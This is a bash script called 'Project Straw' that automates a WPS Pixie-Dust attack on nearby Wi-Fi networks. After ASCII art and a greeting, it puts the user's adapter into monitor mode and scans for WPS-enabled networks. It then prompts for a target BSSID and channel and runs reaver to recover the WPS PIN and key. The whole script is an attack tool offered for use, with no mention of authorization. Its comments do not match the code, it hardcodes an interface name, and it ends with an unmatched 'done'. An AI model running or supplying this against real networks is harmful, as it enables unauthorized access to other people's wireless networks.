#!/bin/bash
# Author: BuffBaby253
# Title: Project Straw
# Description: Interactive Pixie-Dust attack script to make life easier

echo -e "\033[35m" 
# Change color to purple

echo "WWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW
WWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW
WWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWNk:,,:xWWWWWWWWWWW
WWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWKd:o0NNkclXWWWWWWWWW
WWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWNOlckNWWWWWKlc0WWWWWWWW
WWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWXx:o0WWWWWWWWWNd:kWWWWWWW
WWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW0o:dXWWWWWWWWWWWWWO:oNWWWWW
WWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWNkclONWWWWWWWWWWWWWWWWKccKWWWW
WWWWWWWWWWWWWWWWWWWWWWWWWWWWWW0d:dKWWWWWWWWWWWWWWWWWWWWNo:kWWW
WWWWWWWWWWWWWWWWWWWWWWWWWWWNOlckNWWWWWWWWWWWWWWWWWWWWWWWWx:OWW
WWWWWWWWWWWWWWWWWWWWWWWWWKx:o0WWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW
WWWWWWWWWWWWWWWWWWWWWWWOlcxXWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW
WWWWWWWWWWWWWWWWWWWWXxclOWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW
WWWWWWWWWWWWWWWWWW0o:dXWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW
WWWWWWWWWWWWWWWNkclkNWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW
WWWWWWWWWWWWWKd:dKWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW
WWWWWWWWWWWOlcxNWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW
WWWWWWWWXxclOWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW
WWWWWW0dcdKWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW
WWWNOllkNWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW
WWNdd0WWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW
WWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW
WWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW"

echo "Hello, I am Project Straw, an automated Pixie-Dust attack script that targets all nearby networks.
Please plug in your wifi adapter and tell me the interface name. (Ex: wlan1)"

read interface

echo "I will now do as you wish, wait quietly please and thank you"

sleep 10

# Set interface to monitor mode
sudo airmon-ng start $interface
sleep 5

# Scan for nearby networks for 20 seconds
sudo airodump-ng --wps wlan1mon
sleep 20
killall airodump-ng

# Extract BSSIDs from the scan results
echo "Please tell me the BSSID of the network you want to attack"
read BSSID
echo "Great! Now tell me the channel it's on"
read Channel
echo "Now allow me to proceed"
sleep 5

# Loop through each SSID and capture traffic for 2 minutes
sudo reaver -i wlan1mon -c $Channel -b $BSSID -vv -K 1 -N
sleep 20

# Clean up
killall reaver
done
